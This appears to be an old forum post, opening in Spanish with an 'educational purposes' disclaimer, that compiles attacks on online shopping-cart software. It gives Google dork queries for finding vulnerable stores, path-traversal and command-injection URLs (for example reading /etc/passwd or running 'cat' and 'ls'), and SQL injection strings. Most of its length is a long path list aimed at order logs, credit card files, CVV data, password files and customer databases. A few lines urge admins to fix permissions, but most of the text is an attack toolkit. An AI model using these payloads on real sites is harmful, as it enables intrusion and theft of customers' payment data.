a qui les dejo una recopilasion de los xpolite de web shopping
pero no meago responsabel para lo que se use este articulo es con fines educativos
CodeZero
inurl:admin/files/order.log CommerceSQL Proof of Concept as Follows: example:
www.domain.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl example:
http://www.domain.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi example:
http://www.domain.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order.log --- Meta Cart: Meta Cart is a free Ecommerce Shopping Cart System based on ASP and SQL. the form where the database is located with the information is
http://www.domain.com/database/metacart.mdb http://www.domain.com/metacart/database/metacart.mdb So yet again you could do a simple inurl:metacart.mdb in google and find results and just grab the access database and open it up in access and you have the companies information. This is why companies need to protect this data. Its a must for security reasons. All they would have to do is set the permissions on the database in the control panel in Information services, But admins are too lazy. They don't double check. So when Your folder is set to Write, Read and Execute. You know something is wrong. They should be set to Write and Execute for Anonymous so people Can't Download the database. Then rwx on the database itself so you can make changes of course. ---- SHOP.PL Vuln Yet another system that people are using against companies, to again access to their files and get data. Proof of concept.
http://www.domain.com/cgi-local/shop.pl/page=shop.cfg is where the config file is located.
http://www.domain.com/cgi-local/shop.pl/page=../../../../../../../../../../../../../../etc/passwd http://www.domain.com/cgi-local/shop.pl/page=./product_list and again you can do a simple search in google for inurl: shop.pl Windows Servers VULN, lazy admins: A way to get .mdb files (access databases) off ASP servers Search for shopdisplaycategories.asp inurl:shopdisplaycategories.asp plenty of sites use this, once you find some results change the site to.
http://www.domain.com/shopdbtest.asp now you are in a section in the site which you get info where the mdb file is laying xDatabase: shopping and xDblocation:\shop_db now just put
http://www.domain.com/shop_db/shopping.mdb Bascially you can download their Access database with their whole online shop, all there customer data, lazy admins that dont put the correct permissions will leave this open, but smart ones wont let you download the database. Other Key tricks: Going in google: search for "/cgi/shopper.cgi?" or for more results try "/cgi-bin/shopper.cgi?" ("shopcart.cgi" can also be used) find a site ("your shopping cart" or "Subtotal $0.00") and remove everything after shopper.cgi (the url should contain "/cgi/shopper.cgi?display=action" or "/cgi-bin/shopper.cgi?display=action" or possibly "checkout=action") add "?search=action&keywords=%20&template=order.log" to the url and /cgi-bin/shopper.cgi?search=action&keywords=apollos%2520&template=order.log /cgi-bin/shopper.cgi?search=action&keywords=cgi_bin%20&template=order.log /cgi-bin/shopper.cgi?search=action&keywords=cgi_bin%2520&template=shopper.conf /cgi-bin/shopper.cgi?search=action&keywords=powerd0wn%20&template=shopper.conf /cgi-bin/pdg_cart/shopper.conf /cgi-bin/products/loadpage.cgi?user_id=id&file=/orders.txt are some results to play with. Other Vuln's Using Google searching: inurl:shopping.mdb inurl:cart/cart.asp inurl:/productcart inurl:vti_inf.html inurl:service.pwd inurl:users.pwd inurl:authors.pwd inurl:administrators.pwd inurl:shtml.dll inurl:shtml.exe inurl:fpcount.exe inurl:default.asp inurl:showcode.asp inurl:sendmail.cfm inurl:getFile.cfm inurl:imagemap.exe inurl:test.bat inurl:msadcs.dll inurl:htimage.exe inurl:counter.exe inurl:browser.inc inurl:hello.bat inurl:default.asp\ inurl:dvwssr.dll inurl:cart32.exe inurl:add.exe inurl:index.jsp inurl:SessionServlet inurl:glimpse inurl:man.sh inurl:AT-admin.cgi inurl:AT-generate.cgi Once finding a site, you can use various scanners. WIN32 Scanners:
http://packetstormsecurity.nl/UNIX/cgi-scanners/voideye.zip is a very good one.
http://rhino.deny.de/ Triton Scanner
http://www.ksoze.deny.de/ ksoze's Scanner
http://wolfman.deny.de/ webshare scanner
http://xtremet.deny.de/ cmx scanner
http://www.accessdiver.com Accessdiver
http://www.safety-lab.com you can get Shadow Security Scanner (shareware) UNIX: (opensource)
http://packetstormsecurity.nl/UNIX/cgi-scanners/nikto-1.31.tar.gz All of these can load a path list, to test your vuln servers to do auditing, here is an updated list of security holes. against most of the shopping carts. Admins please protect your systems, You dont want your customers data at risk. --- Loadable List to test security: -- /store/log_files/your_order.log /cgi-bin/DCShop/Orders/orders.txt /vpasp/shopdbtest.asp /orders/checks.txt /WebShop/logs /ccbill/secure/ccbill.log /scripts/cart32.exe /cvv2.txt /cart/shopdbtest.asp /cgi-win/cart.pl /shopdbtest.asp /WebShop/logs/cc.txt /cgi-local/cart.pl /PDG_Cart/order.log /config/datasources/expire.mdb /cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.log%00html /orders/orders.txt /cgis/cart.pl /webcart/carts /cgi-bin/cart32.exe/cart32clientlist /cgi/cart.pl /comersus/database/comersus.mdb /WebShop/templates/cc.txt /Admin_files/order.log /orders/mountain.cfg /cgi-sys/cart.pl /scripts/cart.pl /htbin/cart.pl /productcart/database/EIPC.mdb /shoponline/fpdb/shop.mdb /config/datasources/myorder.mdb /PDG_Cart/shopper.conf /shopping/database/metacart.mdb /bin/cart.pl /cgi-bin/cart32.ini /database/comersus.mdb /cgi-local/medstore/loadpage.cgi?user_id=id&file=data/orders.txt /cgi-bin/store/Admin_files/myorderlog.txt /cgi-bin/orders.txt /cgi-bin/store/Admin_files/your_order.log /test/test.txt /fpdb/shop.mdb /cgibin/shop/orders/orders.txt /shopadmin1.asp /cgi-bin/shop.cgi /cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi /cgi-bin/PDG_cart/card.txt /shopper.cgi?preadd=action&key=PROFA&template=order1.log /store/shopdbtest.asp /log_files/your_order.log /_database/expire.mdb /HyperStat/stat_what.log /cgibin/DCShop/auth_data/auth_user_file.txt /htbin/orders/orders.txt /SHOP/shopadmin.asp /index.cgi?page=../admin/files/order.log /vpshop/shopadmin.asp /webcart/config /PDG/order.txt /cgi-bin/shopper.cgi /orders/order.log /orders/db/zzzbizorders.log.html /easylog/easylog.html /cgi-bin/store/Log_files/your_order.log /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=shopping400.mdb /comersus_message.asp? /orders/import.txt /htbin/DCShop/auth_data/auth_user_file.txt /admin/html_lib.pl /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=myorder.txt /cgi-bin/DCShop/auth_data/auth_user_file.txt /cgi-bin/shop.pl/page=;cat%20shop.pl /cgi-bin/shopper?search=action&keywords=dhenzuser%20&template=order.log /HBill/htpasswd /bin/shop/auth_data/auth_user_file.txt /cgi-bin/cs/shopdbtest.asp /mysql/shopping.mdb /Catalog/config/datasources/Products.mdb /trafficlog /cgi/orders/orders.txt /cgi-local/PDG_Cart/shopper.conf /store/cgi-bin/Admin_files/expire.mdb /derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=order.log /derbyteccgi/shopper.cgi?search=action&keywords=moron&template=order.log /cgi-bin/mc.txt /cgi-bin/mall2000.cgi /cgi-win/DCShop/auth_data/auth_user_file.txt /cgi-bin/shopper.cgi?search=action&keywords=root%20&template=order.log /store/commerce.cgi /scripts/shop/orders/orders.txt /product/shopping350.mdb /super_stats/access_logs /cgi-local/orders/orders.txt /cgi-bin/PDG_Cart/mc.txt /cgibin/cart32.exe /cgi-bin/Shopper.exe?search=action&keywords=psiber%20&template=other/risinglogorder.log /cgibin/password.txt /Catalog/cart/carttrial.dat /catalog/Admin/Admin.asp /ecommerce/admin/user/admin.asp /data/productcart/database/EIPC.mdb /store/admin_files/commerce_user_lib.pl /cgi-bin/store/index.cgi /paynet.txt /config/datasources/store/billing.mdb /_database/shopping350.mdb /cgi-bin/shopper.exe?search /cgi/shop.pl/page=;cat%20shop.pl /cgi-bin/store/Admin_files/orders.txt /cgi-bin/store/commerce_user_lib.pl /cgi-sys/pagelog.cgi /cgi-sys/shop.pl/page=;cat%20shop.pl /scripts/weblog /fpdb/shopping400.mdb /htbin/shop/orders/orders.txt /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=myorder.log /cgi-bin/shopper.exe?search=action&keywords=psiber&template=order.log /mall_log_files/ /cgi-bin/perlshop.cgi /tienda/shopdbtest.asp /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=shopping.mdb /cgi-bin/shopper.cgi?search=action&keywords=whinhall&template=order.log /WebShop/logs/ck.log /fpdb/shopping300.mdb /mysql/store.mdb /cgi-bin/store/Admin_files/commerce_user_lib.pl /config.dat /order/order.log /commerce_user_lib.pl /Admin_files/AuthorizeNet_user_lib.pl /cvv2.asp /cgi-bin/cart32/CART32-order.txt /wwwlog /cool-logs/mlog.html /cgi-bin/pass/merchant.cgi.log /cgi-local/pagelog.cgi /cgi-bin/pagelog.cgi /cgi-bin/orders/cc.txt /cgis/shop/orders/orders.txt /admin/admin_conf.pl /cgi-bin/pdg_cart/order.log /cgi/PDG_Cart/order.log /Admin_files/ccelog.txt /cgi-bin/orders/mc.txt /cgi/cart32.exe /ecommerce/admin/admin.asp /scripts/DCShop/auth_data/auth_user_file.txt /Catalog/config/datasources/Expire.mdb /ecommerce/admin/shopdbtest.asp /mysql/mystore.mdb /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=shopping.asp /cgi-bin/commercesql/index.cgi?page=../admin/files/order.log /cgi-bin/Count.cgi?df=callcard.dat /logfiles/ /shopping/shopping350.mdb /admin/configuration.pl /cgis/DCShop/auth_data/auth_user_file.txt /cgis/cart32.exe /cgi-bin/dcshop.cgi /cgi-win/shop/auth_data/auth_user_file.txt /shopping400.mdb /HBill/config /cgi-bin/shop/index.cgi?page=../admin/files/order.log /search=action&keywords=GSD%20&template=order.log /WebCart/orders.txt /PDG_Cart/authorizenets.txt /cgi-bin/AnyForm2 /~gcw/cgi-bin/Count.cgi?df=callcard.dat /cgi-bin/PDG_Cart/order.log /expire.mdb /logger/ /webcart-lite/orders/import.txt /cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl /cgi-bin/PDG_Cart/shopper.conf /cgi-bin/cart32.exe /dc/orders/orders.txt /cgi-local/DCShop/orders/orders.txt /shop.pl/page=shop.cfg /cgi-local/cart32.exe /cgi-win/pagelog.cgi /cgi-win/shop/orders/orders.txt /cgibin/shopper.cgi?search=action&keywords=moron&template=order.csv /cgi-sys/DCShop/auth_data/auth_user_file.txt /cgi-bin/www-sql;;; /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=order.log /scripts/orders/orders.txt /cgi-local/shop.pl/shop.cfg /search=action&keywords=cwtb%20&template=expire.mdb /php/mylog.phtml /config/datasources/shopping.mdb /php-coolfile/action.php?action=edit&file=config.php /cgi-bin/ezmall2000/mall2000.cgi /cgi/DCShop/orders/orders.txt /cgi-local/shop.pl /cgis/DCShop/orders/orders.txt /product/shopdbtest.asp /ASP/cart/database/metacart.mdb /cgi-bin/cgi-lib.pl /cgi-bin/mailview.cgi?cmd=view&fldrname=inbox&select=1&html /search=action&keywords=cwtb%20&template=order.log /mysql/expire.mdb /scripts/shop/auth_data/auth_user_file.txt /cgi-bin/cart32/whatever-OUTPUT.txt /Shopping%20Cart/shopdbtest.asp /cgi/shop/auth_data/auth_user_file.txt /shop/shopping350.mdb /cgi-bin/store/Authorize_Net.pl /scripts/DCShop/orders/orders.txt /store/log_files/commerce_user_lib.pl /shopping/shopadmin.asp /cgi-bin/orderlog.txt /cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20../../webcart/system/orders/orders.txt|&CODE=PHOLD;;; /cool-logs/mylog.html /cgibin/shop.pl/page=;cat%20shop.pl /htbin/shop.pl/page=;cat%20shop.pl /cgi-win/orders/orders.txt /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=order1.txt /SHOP/shopdbtest.asp /cgi/pagelog.cgi /php/mlog.phtml /cgi-bin/shop/apdproducts.mdb /htbin/shop/auth_data/auth_user_file.txt /server%20logfile;;; /database/metacart.mdb /cgi-local/shop/orders/orders.txt /dcshop/auth_data/auth_user_file.txt /log/ /cgi-bin/shop.cgi/page=../../../../etc/hosts /scripts/c32web.exe /cgis/orders/orders.txt /logfile/ /shop_db/shopping.mdb /shopping.mdb /weblog/ /config/datasources/cvv2.mdb /cgi-bin/loadpage.cgi?user_id=id&file=data/db.txtcgi-bin/PDG_Cart/order.log /cgi-sys/shop/orders/orders.txt /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=order1.log /cgi-win/cart32.exe /cgi-bin/loadpage.cgi /dcshop/orders/orders.txt /shop/show.php?q=' /cgibin/orders/orders.txt /bin/pagelog.cgi /cgi-bin/shop/orders/orders.txt /_database/shopdbtest.asp /cgibin/pagelog.cgi /cgi-local/shop.pl/page=;cat%20shop.pl /shop/search.php?q=' /cgi-sys/cart32.exe /order13.txt /weblogs/ /orderb/shop.mdb /config/datasources/order.mdb /store/cgi-bin/Admin_files/Store_user_lib.pl /cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&file=data/db.txt;CC /Orders/order.log /logs/access_log /config/datasources/your_order.mdb /ecommerce/admin/admin/admin.asp /mall_log_files/order.log /bin/cart32.exe /htbin/DCShop/orders/orders.txt /Admin_files/Authorize_Net.pl /logging/ /database/ /cgi-sys/shop/auth_data/auth_user_file.txt /bin/shop.pl/page=;cat%20shop.pl /cgi-local/shop/auth_data/auth_user_file.txt /cgi-local/DCShop/auth_data/auth_user_file.txt /cgi-bin/shop/auth_data/auth_user_file.txt /cgi-win/DCShop/orders/orders.txt /store/Admin_files/Authorize_Net.pl /cart/cart.asp /bin/DCShop/orders/orders.txt /scripts/pagelog.cgi /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=expire.mdb /webcart/config/clients.txt /dc/auth_data/auth_user_file.txt /cgi-bin/shopper.exe?preadd=action&key=9461&template=order.log /cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&file=data/db.txt /bin/orders/orders.txt /cgi-bin/Web_Store/web_store.cgi /cgis/pagelog.cgi /cgi-bin/orders/orders.txt /merchant/shopdbtest.asp /cgi-local/shop.pl/page=shop.cfg /cgis/shop.pl/page=;cat%20shop.pl /index.cgi?%20pagine%20=%20../../../../../../../../etc/passwd /cg-bin/ /cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG /cgi-bin/DCShop/Auth_data/auth_user_file.txt /ecommerce/admin/adminLeft/admin.asp /webcart/orders/import.txt /cgibin/shop/auth_data/auth_user_file.txt /productcart/database/eipc.mdb /mysql/cheersoundchdb.mdb /cgi-bin/order.txt /scripts/iisadmin/tools/mkilog.exe /ProductCart/database/EIPC.mdb /databases/ /cgi-sys/orders/orders.txt /cgi/DCShop/auth_data/auth_user_file.txt /database/EIPC.mdb //cgi-bin/orders.txt /vpasp-shopcart/shopdbtest.asp /cgi-bin/shopper.exe?preadd=action&key=bajk390ss&template=order.log /cgi-bin/DCShop/orders/orders.txt /mysql/shopping350.mdb /_database/shopping.mdb /htbin/cart32.exe /PDG_Cart/shopper.config /cgis/shop/auth_data/auth_user_file.txt /shop/SHOPDBTEST.ASP /bin/shop/orders/orders.txt //cgi-local/medstore/loadpage.cgi?user_id=id&file=data/orders.txt /cgi-bin/store/dcshop_admin.cgi /_database/shopping400.mdb /scripts/shop.pl/page=;cat%20shop.pl /cgibin/PDG_Cart/shopper.conf /cgibin/DCShop/orders/orders.txt /cgibin/%20awstats.pl?output=keywords /cgi/shop/orders/orders.txt /cgi-bin/cart32_old.exe /webshop/templates/cc.txt /webcart/orders /productcart/database/shop.mdb /index.php?link=order /cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd /shopping/shopdisplayproducts.asp? /ccbill-local.cgi /bin/DCShop/auth_data/auth_user_file.txt /cgi-bin/c32web.exe/CheckError?error=53 /server/admin_files/commerce_user_lib.pl /shopping/shopdisplayproducts.asp?id=1&cat=order.log /mail.cgi /cgibin/admin_files/ /cgi-bin/mail/form.cgi /cgibin/shopping/database/metacart.mdb /globill/ver12otellog.txt /cgi-bin/shopping.mdb /shopping%20.mdb /cgi-bin/mail.cgi /cgi-bin/FORM.cgi /cgibin/shop/database/metacart.mdb /mail/form.cgi /cgibin/shop/shopping350.mdb /form.cgi /shopping/cgi-bin/cart32.ini /index.cgi?page=../../../../../../../../etc/passwd /cgi-bin/c32web.exe/ShowProgress /vpasp/shopdisplayproducts.asp?cat=qwerty'%20union%20select%20fldauto /cgibin/orders.txt /cgibin/scripts/shop/shopping350.mdb /form/mail.cgi /cgi-bin/store1b/index.cgi?page=../../../../../../../../etc/passwd /webshop/logs/cc.txt /form/form.cgi /store/index.cgi?page=../../../../../../../../etc/passwd /cgibin/awstats.pl%3Flang%3Dit%26output%3Durldetail /cgibin/%20awstats.pl? /cgi-bin/Form.cgi /vpasp/shopdisplayproducts.asp?cat=admin'%20and%20fldpassword%0li%20ke%20'a%25 /admin.mdb /cgi-bin/cart32.exe/error /cgi/mail.cgi /cgi-bin/c32web.exe/ShowAdminDir /cgi-bin/csql/index.cgi?page=../admin/files/order.log /cgi-bin/admin_files/ /cgi-bin/csql/index.cgi?page=../../../../../../../../etc/passwd /admins.asp /cgi-bin/cart_top /cgi-bin/mail/mail.cgi /shopadmin.asp /cgi-bin/order.log /mailform.pl /cgibin/admin.pl /vpasp/shopdisplayproducts.asp? /policies1.htm /cgi-bin/c32web_old.exe /cgi-bin/c32web.exe /cgi-bin/form/form.cgi /cgibin/metacart.mdb /shopdisplayproducts.asp /cgi-sys/DCShop/orders/orders.txt /ccbill6/secure/ /MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=3124&STRMVER=4&CAPREQ=0 /cgi-bin/ibill.log /ccbill6/ /password.txt /cgi-bin/PDG_cart/card /cgibin/www.google.com /honeymoonhideaway.htm+honeymoon+charleston /cgibin/awstats.pl%3Flang%3Dnl /cgibin/admin.pl?setpasswd /cgibin/awstats.pl%3Fyear%3D2003%26month%3D07 /cgibin/awstats.pl%3Fyear%3D2003%26month%3D08 /cgibin/awstats.pl%3Fyear%3D2003%26month%3D09 /cgibin/%20awstats.pl?output=keywords /shop/shopping450.mdb /ccbill6/secure/ccbill.log /cgibin/awstats.pl%3Flang%3Des%26update%3D1 /cgibin/shopper.cgi?search=action&keywords=ccpower%20&template=shopper.conf /cgi-bin/form.cgi /M83A /cgibin/awstats.pl%3Fyear%3D2003%26month%3D11 /cgibin/amadmin.pl?setpasswd /cgi-bin/awstats.pl%3Flang%3Dit /orderdb/database/eipc.mdb /cg-bin//eshop/database/order.mdb /store/database/comersus.mdb /cgibin/password.mdb /~admin/guestbook /cgibin/%20awstats.pl?%20cgibin/%20awstats.pl?output=keywords /cgibin/awstats.pl%3Foutput%3Durldetail%26lang%3Dnl /cgibin/%20awstats.pl?output=keywords /sumthin /cgibin/cgibin/%20awstats.pl?output=keywords /cgi-bin/shopper.cgi?search=action&keywords=ccpower&template=shopper.conf /cgibin/productcart/database/eipc.mdb /cgibin/awstats.pl%3Flang%3Den%26output%3Durldetail /cgibin/awstats.pl%3Foutput%3Dkeyphrases%26lang%3Dit /cgibin/awstats.pl%3Foutput%3Durldetail%26lang%3Dde /mail/mail.cgi /cgibin/shopper.cgi?search=action&keywords=ccpower&template=shopper.conf /cgibin/awstats.pl%3Foutput%3Dkeywords%26lang%3Dnl /cg/.%20/comersus/database/comersus.mdb /index%20of%20/%20productcart/database/eipc.mdb /scripts/nsiislog.dll /cgibin/order.cgi /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=2614&STRMVER=4&CAPREQ=0 /cgi-bin/awstats.pl%3Flang%3Dde /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=3124&STRMVER=4&CAPREQ=0 /cgibinserver/admin_files/commerce_user_lib.pl /cgibin/store/Admin_files/myorderlog.txt //cgibin/orders.txt /cgibin/database/shopping.mdb /cgibin/shopping/shopadmin.asp /cgi-bin/shopper.cgi?preadd=action&key=PROFA&template=order1.log /cgibin/shopper.exe?search=action&keywords=psiber&template=order.log /cgibin/allmanageup.pl /cgi-win/shop.pl/page=;cat%20shop.pl /eshop/database/log.mdb /cgibin/awsta /cgibin/nph-proxy.pl /cgibin/awstats.pl%3Flang%3Dnl%26update%3D1 //config/datasources/expire.mdb /cgibin/awstats.pl%3Foutput%3Dkeywords%26lang%3Den /cgibin/awstats.pl%3Foutput%3Dkeywords%26lang%3Des /cgibin/ccbill/password/.htpasswd /cgi-bin/awstats.pl%3Fyear%3D2003%26month%3D08 /cgibin/awstats.pl%3Flang%3Dde%26output%3Dkeyphrases /eshop/en/database/credit.mdb /cgi-bin/pdg_cart/shopper.conf /password.mdb /data/verotellog.txt /cgibin/awstats.pl%3Foutput%3Durldetail%26update%3D1 /productcart/eipc.mdb /cgi-bin/awstats.pl%3Fyear%3D2003%26month%3D11 /cgibin/awstats.pl%3Foutput%3Durldetail%26lang%3Dit /index%20of%20/webshop/templates/cc.txt /cartdb/database/eipc.mdb /cgi-bin/eshop/database/order.mdb /cgibin//fpdb/shopping400.mdb /cgibin/order.txt /cgi-bin/cart32.exe/expdate%20algunas%20veces /cgibin/awstats.pl%3Flang%3Dde%26output%3Dkeywords /cgibin/database/comersus.mdb /cgi-bin/awstats.pl%3Flang%3Des /cgibin/awstats.pl%3Foutput%3Dkeywords%26lang%3Dfr /globill/ /cgibin/fpdb/shopping400.mdb /cgibin/perl.exe /eshop/en/database/log.mdb /cgibin/shopper.exe?search=action&keywords=psiber&template=orders.log /cg/comersus/database/comersus.mdb /cgi-bin/awstats.pl%3Fyear%3D2003%26month%3D07 /cgibin/awstats.pl%3Flang%3Dnl%26output%3Durldetail /cgibin/admin.mdb /cgi-bin/whereami.cgi?g=ls /cgibin/xxxhu /cgibin/cartserver/admin_files/commerce_user_lib.pl /cgibin/%20awstats.pl?output=keywords /cgibin/awstats.pl%3Foutput%3Dkeyphrases%26lang%3Dfr /robot.txt /cgi-bin/form/mail.cgi /ibill/mypins/ /cgi-bin/awstats.pl%3Flang%3Dnl /cgibin/allmanage_admin.pl /cgibin/%20awstats.pl?cgibin/%20awstats.pl?output=keywords /cg-ibin/admin_files/ /cgibin/cart/comersus.mdb /cg-bin/eshop/database/order.mdb /cgibin/htt /cgibin/phf /cgibin/awstats.pl%3Foutput%3Durldetail%26lang%3Den /database/eipc.mdb /MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=2614&STRMVER=4&CAPREQ=0 /script/shop/shopping350.mdb /cgibin/shopping350.mdb /cg-bin/eshop/en/database/credit.mdb /cgibin/awstats.pl%3Foutput%3Dkeyphrases%26lang%3Den /cgi-bin/add-passwd.cgi /logs/200306/charleston.com/ /random_banner/index.cgi?image_list=alternative_image.list&html_file=|ls%20-la| /cgibin/store/log_files/your_order.log /cgibin/shopper.exe?search=action&keywords=psiber&template=neworder.log /cgi-bin/awstats.pl%3Fyear%3D2003%26month%3D09 /cgibin/awstats.pl%3Flang%3Dfr%26update%3D1 /cgibin/awstats.pl%3Foutput%3Dkeywords%26update%3D1 /cgibin/awstats.pl%3Foutput%3Dkeyphrases%26lang%3Dnl /cgibin/awstats.pl%3Flang%3Dde%26output%3Durldetail /cgibin/mailform.pl /cgibin/awstats.pl%3Flang%3Des%26output%3Dkeywords /cgi-bin/shop/shopping350.mdb /cgibin/cart/database/comersus.mdb /dbase/date. /www.gambling-01.co.uk/cgibin/password.txt /cgibin/awstats.pl%3Flang%3Des /ccbill/ccbill.log /cgibin/awstats.pl%3Flang%3Dnl%26output%3Dkeywords /cgibin/awstats.pl%3Foutput%3Dkeyphrases%26lang%3Dde /productcart/pc/Custvb.asp?redirectUrl=&Email=%27+having+1%3D1--&_email=email&password=asd&_password=required&Submit.x=33&Submit.y=5&Submit=Submit /cgibin/index%20of /cgi-bin/form1.cgi /cc.txt /cgibin/awstats.pl%3Flang%3Den%26update%3D1 /cg/./comersus/database/comersus.mdb /cgi-bin/awstats.pl%3Foutput%3Dkeyphrases /cgibin/webshop/templates/cc.txt /....../ all /....../config.sys /....../etc/hosts /../../../../ all /../../../../../../../boot.ini /../../../../../winnt/repair/sam._ /../../../../config.sys /../../../../etc/hosts /.access /.bash_history /.htaccess /.html/............./config.sys /.htpasswd /.passwd /ASPSamp/AdvWorks/equipment/catalog_type.asp /Admin_files/order.log /AdvWorks/equipment/catalog_type.asp /Orders/order.log /PDG_Cart/order.log /PDG_Cart/shopper.conf /PSUser/PSCOErrPage.htm /WebShop/logs/cc.txt /WebShop/logs/ck.log /WebShop/templates/cc.txt /_private /_vti_bin/_vti_aut/dvwssr.dll /_vti_bin/fpcount.exe /_vti_inf.html /_vti_pvt /_vti_pvt/administrators.pwd /_vti_pvt/authors.pwd /_vti_pvt/service.pwd /_vti_pvt/shtml.dll /_vti_pvt/shtml.exe /_vti_pvt/users.pwd /adsamples/config/site.csc /bin /carbo.dll /ccbill/secure/ccbill.log /cfdocs/cfmlsyntaxcheck.cfm /cfdocs/exampleapp/docs/sourcewindow.cfm /cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini /cfdocs/expelval/displayopenedfile.cfm /cfdocs/expelval/exprcalc.cfm /cfdocs/expelval/openfile.cfm /cfdocs/expelval/sendmail.cfm /cfdocs/snippets/fileexists.cfm /cfdocs/snippets/viewexample.cfm /cgi /cgi-bin /cgi-bin/AT-admin.cgi /cgi-bin/AT-generate.cgi /cgi-bin/Admin_files/order.log /cgi-bin/AnyForm2 /cgi-bin/Cgitest.exe /cgi-bin/Count.cgi /cgi-bin/FormHandler.cgi /cgi-bin/GW5/GWWEB.EXE /cgi-bin/UltraBoard.cgi /cgi-bin/UltraBoard.pl /cgi-bin/add_ftp.cgi /cgi-bin/adp /cgi-bin/adpassword.txt /cgi-bin/ads.setup /cgi-bin/aglimpse /cgi-bin/alibaba.pl /cgi-bin/allmanage.pl /cgi-bin/allmanage/adp /cgi-bin/allmanage/k /cgi-bin/allmanage/settings.cfg /cgi-bin/allmanage/userfile.dat /cgi-bin/allmanageup.pl /cgi-bin/anyboard.cgi /cgi-bin/architext_query.pl /cgi-bin/authorize/dbmfiles/users /cgi-bin/ax-admin.cgi /cgi-bin/ax.cgi /cgi-bin/bigconf.cgi all /cgi-bin/bizdb1-search.cgi /cgi-bin/bnbform.cgi /cgi-bin/cachemgr.cgi /cgi-bin/calender.pl /cgi-bin/calender_admin.pl /cgi-bin/campas /cgi-bin/cart.pl /cgi-bin/cgiwrap /cgi-bin/classifieds.cgi /cgi-bin/clickresponder.pl /cgi-bin/cmd.exe /cgi-bin/counterfiglet /cgi-bin/dbmlparser.exe /cgi-bin/dig.cgi /cgi-bin/dnewsweb /cgi-bin/edit.pl /cgi-bin/environ.cgi /cgi-bin/excite /cgi-bin/faxsurvey /cgi-bin/filemail.pl /cgi-bin/files.pl /cgi-bin/finger /cgi-bin/finger.pl /cgi-bin/formmail.pl /cgi-bin/fpcount.exe /cgi-bin/fpexplore.exe /cgi-bin/gH.cgi /cgi-bin/get32.exe /cgi-bin/glimpse /cgi-bin/guestbook.cgi /cgi-bin/handler /cgi-bin/htimage.exe /cgi-bin/htmlscript /cgi-bin/htsearch /cgi-bin/htsearch /cgi-bin/iisadmpwd/achg.htr /cgi-bin/iisadmpwd/aexp.htr /cgi-bin/iisadmpwd/aexp2.htr /cgi-bin/iisadmpwd/anot.htr /cgi-bin/imagemap.exe /cgi-bin/info2www /cgi-bin/infosrch.cgi /cgi-bin/input.bat /cgi-bin/input2.bat /cgi-bin/jj /cgi-bin/k /cgi-bin/loadpage.cgi /cgi-bin/mailform.exe /cgi-bin/maillist.pl /cgi-bin/makechanges/easysteps/easysteps.pl /cgi-bin/man.sh /cgi-bin/netstat /cgi-bin/nph-publish /cgi-bin/nph-test-cgi /cgi-bin/passwd /cgi-bin/passwd.txt /cgi-bin/perl.exe /cgi-bin/perlshop.cgi /cgi-bin/pfdispaly.cgi /cgi-bin/pfdisplay /cgi-bin/pfdisplay.cgi /cgi-bin/phf /cgi-bin/php.cgi /cgi-bin/plusmail /cgi-bin/postcard.pl /cgi-bin/printenv /cgi-bin/process_bug.cgi /cgi-bin/query /cgi-bin/responder /cgi-bin/rguest.exe /cgi-bin/rpm_query /cgi-bin/rwwwshell.pl /cgi-bin/search.cgi /cgi-bin/settings.cfg /cgi-bin/sojourn /cgi-bin/survey.cgi /cgi-bin/test-cgi /cgi-bin/test.bat /cgi-bin/textcounter.pl /cgi-bin/tpgnrock /cgi-bin/tst.bat /cgi-bin/tst.bat /cgi-bin/unlg1.1 /cgi-bin/unlg1.2 /cgi-bin/userfile.dat /cgi-bin/view-source /cgi-bin/visadmin.exe /cgi-bin/w3-msql/ /cgi-bin/webbbs.cgi /cgi-bin/webdist.cgi /cgi-bin/webplus /cgi-bin/websendmail /cgi-bin/webwho.pl /cgi-bin/wguest.exe /cgi-bin/whois_raw.cgi /cgi-bin/windmail.exe /cgi-bin/wrap /cgi-bin/www-sql /cgi-bin/wwwadmin.pl /cgi-bin/wwwboard.pl /cgi-dos/args.bat /cgi-dos/args.cmd /cgi-local /cgi-shl/win-c-sample.exe /cgi-src /cgi-src/phf.c /cgi-win /cgi-win/uploader.exe /cgibin /com1 /com2 /com3 /com4 /con/con /config/checks.txt /config/import.txt /config/mountain.cfg /config/orders.txt /default.asp. /default.asp::$DATA /doc /iisadmpwd/aexp2.htr /iishelp/iis/misc/iirturnh.htw /iissamples/exair/howitworks/codebrws.asp /iissamples/exair/search/advsearch.asp /iissamples/exair/search/qfullhit.htw /iissamples/exair/search/qsumrhit.htw /iissamples/iissamples/query.asp /iissamples/issamples/oop/qfullhit.htw /iissamples/issamples/oop/qsumrhit.htw /iissamples/sdk/asp/docs/codebrws.asp /log /logs /mall_log_files/order.log /manage/cgi/cgiproc /msadc/Samples/SELECTOR/showcode.asp /msadc/msadcs.dll /msads/Samples/SELECTOR/showcode.asp /ncl_items.html /order/order.log /orders/checks.txt /orders/import.txt /orders/mountain.cfg /orders/order.log /orders/orders.txt /ping all /ping?SomeCrapHere /piranha/secure/passwd.php3 /pw/storemgr.pw /quikstore.cfg /samples/search/queryhit.htm /scripts /scripts/CGImail.exe 